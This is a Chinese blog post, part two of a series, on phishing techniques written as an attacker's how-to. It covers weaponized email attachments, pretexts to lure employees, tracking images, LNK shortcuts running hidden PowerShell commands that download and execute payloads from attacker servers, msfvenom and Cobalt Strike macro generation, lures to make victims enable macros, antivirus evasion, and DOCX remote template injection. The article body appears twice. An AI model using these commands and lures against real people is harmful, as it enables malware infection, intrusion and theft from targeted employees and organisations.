searchusermenu
  • 发布文章
  • 消息中心
点赞
收藏
评论
分享
原创

网站钓鱼常见方法(二)

2023-05-16 08:55:44
100
0

msf网络钓鱼是一种网络攻击形式,攻击者伪装成合法实体以诱骗个人泄露敏感信息,例如密码、信用卡号或其他个人详细信息。 而随着互联网资产多样性的增加,出现了越来越多不同类型的钓鱼方法,书接上文,本文会接着介绍一些常见的钓鱼方法。

一、木马附件

用伪装的电邮(不限于常见邮件,一些内部的oa、erp或其他供员工使用交流带附件功能的系统亦可),附件携带宏病毒,或快捷方式类木马,亦或捆绑在正常软件中的木马等,发送给目标。不推荐excel方式,wps占据国人大部分系统。

各类OA系统的漏洞都被修补得差不多无法getshell的情况下,一定不要放弃他,例如seeyon,弱口令进OA,再提取其他用户的username再跑一次弱口令,通过收集用户日常工作往来信件,针对其他人与该账号平时的工作内容制定话术,定向钓鱼。

1.构造附件

Office类文件: 编写申请、招聘、工作派发、应急、国家标准、假期通知、福利相关等邮件正文诱导客户执行宏文件。

Exe: 编写VPN、内部工具更新、工资福利查询软件、抢红包等工具诱导客户运行。

自解压: 编写有关机密、高度机密相关数据,并制作带有shellloader的自解压程序,再结合link、powershell等方式,获取目标机器权限。

2.图片链接

内置自定义图片链接。

有一些邮件客户端会主动加载邮件图片,当加载图片时,会通过客户端请求我们的网站,此时在网站内可以记录目标User-agent、外网IP等数据,再根据User-agent可以获取目标系统、系统版本、浏览器以及浏览器版本等信息。

二、诱饵制作

1.快捷方式Lnk

修改快捷方式中的目标栏内容执行 powershell 命令下载木马。

可利用性

需要利用powershell外联下载。

制作过程

将以下内容写入目标栏中:
1.外联下载
C:\Windows\System32\cmd.exe /c powershell.exe -nop -w hidden -command IEX(new-object net.webclient).DownloadFile('http://ip/shell.exe','C:\Windows\Temp\shell.exe');& cmd /c "C:\Windows\
Temp\shell.exe"
调用powershell,隐藏窗口执行下载指定服务器的exe文件,存储到某一个文件夹下,命令行执行exe文件。
2.上线CS
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://192.168.203.128:80/a'))"

2.office宏攻击(Macro)

https://cloud.tencent.com/developer/article/2008720

office宏,译自英文Macro,是Office自带的一种高级脚本特性,通过VBA代码,可以在Office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。

有着独特的文件后缀名,如:xlsm,docm,pptm等。

可利用性

office宏钓鱼存在几大不适用性

  • 对方电脑未使用office。
  • office默认禁用宏,打开文件会进行提示。
  • 独特的宏文件后缀,docm,xlsm等,容易引起他人怀疑。
  • 免杀性要求较高。

诱导开启套路

office默认禁用宏,需要诱导开启

  • 文档是被保护状态,需要启用宏才能查看;
  • 添加一张模糊的图片,提示需要启用宏才能查看高清图片;
  • 提示要查看文档,按给出的一系列步骤操作;
  • 贴一张某杀毒软件的Logo图片,暗示文档被安全软件保护。

制作过程

法一、msf和cs普通宏代码

可利用性:非常容易被杀软识别

制作过程

一、msf
1.msf生成宏代码
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx lport=xx -f vba -o test.vba
2.新建一个支持宏的office文件
docm,xlsm,pptm
3.开启宏选项
首先选择文件-选项-自定义功能区-开发工具
4.新建宏
创建一个新的宏,位置为创建的测试文档,将生成的宏代码复制进去
5.msf监听
use exploit/multi/handler
6.打开宏文件
提示宏被禁用,点击启用内容

二、CS
1.cs生成宏代码
攻击-生成后门-office宏
2、3、4同上
5.打开宏文件
提示宏被禁用,点击启用内容

法二、制造陷阱宏

可利用性:过不了火绒

制作过程

把恶意宏最末尾的一块代码删掉,恶意Word仍然能够上线,并且能在一定程度上规避查杀

法三、DOCX文档远程模板注入

本地文件中在没有宏代码的情况下,攻击者可以尝试执行远程文件中宏代码。

可利用性:本地文件无需加载宏可过静态检测,但是需要远程加载cs马过不了火

制造过程:

第一步、编成一个带有宏代码的dotm文档(模板文档),上传至服务器

具体操作如法一,只是保存文件为dotm后缀。
eg:保存路径http://192.168.203.129:8080/test.dotm

第二步、编写一个可以远程连接的docx文档

最好通过网络加载一个word模板,如单纯只填写文本,则目录结构会不同

第三步、将docx文档后缀改为zip,解压找到目录word/_rels/下的settings.xml.rels

第四步、打开编辑

将targer所指路径改为我们的服务器dotm存储的路径,保存

第五步、还原为docx文件

在RemoteMacroExecute路径下,将其中所有目录及文件选中,点击右键压缩,选中压缩文件格式为zip,压缩方式为存储,然后对其进行压缩,并将其后缀名修改为docx

第六步、打开docx文件远程加载宏

0条评论
0 / 1000
Icecream
9文章数
0粉丝数
Icecream
9 文章 | 0 粉丝
原创

网站钓鱼常见方法(二)

2023-05-16 08:55:44
100
0

msf网络钓鱼是一种网络攻击形式,攻击者伪装成合法实体以诱骗个人泄露敏感信息,例如密码、信用卡号或其他个人详细信息。 而随着互联网资产多样性的增加,出现了越来越多不同类型的钓鱼方法,书接上文,本文会接着介绍一些常见的钓鱼方法。

一、木马附件

用伪装的电邮(不限于常见邮件,一些内部的oa、erp或其他供员工使用交流带附件功能的系统亦可),附件携带宏病毒,或快捷方式类木马,亦或捆绑在正常软件中的木马等,发送给目标。不推荐excel方式,wps占据国人大部分系统。

各类OA系统的漏洞都被修补得差不多无法getshell的情况下,一定不要放弃他,例如seeyon,弱口令进OA,再提取其他用户的username再跑一次弱口令,通过收集用户日常工作往来信件,针对其他人与该账号平时的工作内容制定话术,定向钓鱼。

1.构造附件

Office类文件: 编写申请、招聘、工作派发、应急、国家标准、假期通知、福利相关等邮件正文诱导客户执行宏文件。

Exe: 编写VPN、内部工具更新、工资福利查询软件、抢红包等工具诱导客户运行。

自解压: 编写有关机密、高度机密相关数据,并制作带有shellloader的自解压程序,再结合link、powershell等方式,获取目标机器权限。

2.图片链接

内置自定义图片链接。

有一些邮件客户端会主动加载邮件图片,当加载图片时,会通过客户端请求我们的网站,此时在网站内可以记录目标User-agent、外网IP等数据,再根据User-agent可以获取目标系统、系统版本、浏览器以及浏览器版本等信息。

二、诱饵制作

1.快捷方式Lnk

修改快捷方式中的目标栏内容执行 powershell 命令下载木马。

可利用性

需要利用powershell外联下载。

制作过程

将以下内容写入目标栏中:
1.外联下载
C:\Windows\System32\cmd.exe /c powershell.exe -nop -w hidden -command IEX(new-object net.webclient).DownloadFile('http://ip/shell.exe','C:\Windows\Temp\shell.exe');& cmd /c "C:\Windows\
Temp\shell.exe"
调用powershell,隐藏窗口执行下载指定服务器的exe文件,存储到某一个文件夹下,命令行执行exe文件。
2.上线CS
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://192.168.203.128:80/a'))"

2.office宏攻击(Macro)

https://cloud.tencent.com/developer/article/2008720

office宏,译自英文Macro,是Office自带的一种高级脚本特性,通过VBA代码,可以在Office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。

有着独特的文件后缀名,如:xlsm,docm,pptm等。

可利用性

office宏钓鱼存在几大不适用性

  • 对方电脑未使用office。
  • office默认禁用宏,打开文件会进行提示。
  • 独特的宏文件后缀,docm,xlsm等,容易引起他人怀疑。
  • 免杀性要求较高。

诱导开启套路

office默认禁用宏,需要诱导开启

  • 文档是被保护状态,需要启用宏才能查看;
  • 添加一张模糊的图片,提示需要启用宏才能查看高清图片;
  • 提示要查看文档,按给出的一系列步骤操作;
  • 贴一张某杀毒软件的Logo图片,暗示文档被安全软件保护。

制作过程

法一、msf和cs普通宏代码

可利用性:非常容易被杀软识别

制作过程

一、msf
1.msf生成宏代码
msfvenom -p windows/meterpreter/reverse_tcp lhost=xx lport=xx -f vba -o test.vba
2.新建一个支持宏的office文件
docm,xlsm,pptm
3.开启宏选项
首先选择文件-选项-自定义功能区-开发工具
4.新建宏
创建一个新的宏,位置为创建的测试文档,将生成的宏代码复制进去
5.msf监听
use exploit/multi/handler
6.打开宏文件
提示宏被禁用,点击启用内容

二、CS
1.cs生成宏代码
攻击-生成后门-office宏
2、3、4同上
5.打开宏文件
提示宏被禁用,点击启用内容

法二、制造陷阱宏

可利用性:过不了火绒

制作过程

把恶意宏最末尾的一块代码删掉,恶意Word仍然能够上线,并且能在一定程度上规避查杀

法三、DOCX文档远程模板注入

本地文件中在没有宏代码的情况下,攻击者可以尝试执行远程文件中宏代码。

可利用性:本地文件无需加载宏可过静态检测,但是需要远程加载cs马过不了火

制造过程:

第一步、编成一个带有宏代码的dotm文档(模板文档),上传至服务器

具体操作如法一,只是保存文件为dotm后缀。
eg:保存路径http://192.168.203.129:8080/test.dotm

第二步、编写一个可以远程连接的docx文档

最好通过网络加载一个word模板,如单纯只填写文本,则目录结构会不同

第三步、将docx文档后缀改为zip,解压找到目录word/_rels/下的settings.xml.rels

第四步、打开编辑

将targer所指路径改为我们的服务器dotm存储的路径,保存

第五步、还原为docx文件

在RemoteMacroExecute路径下,将其中所有目录及文件选中,点击右键压缩,选中压缩文件格式为zip,压缩方式为存储,然后对其进行压缩,并将其后缀名修改为docx

第六步、打开docx文件远程加载宏

文章来自个人专栏
文章 | 订阅
0条评论
0 / 1000
请输入你的评论
0
0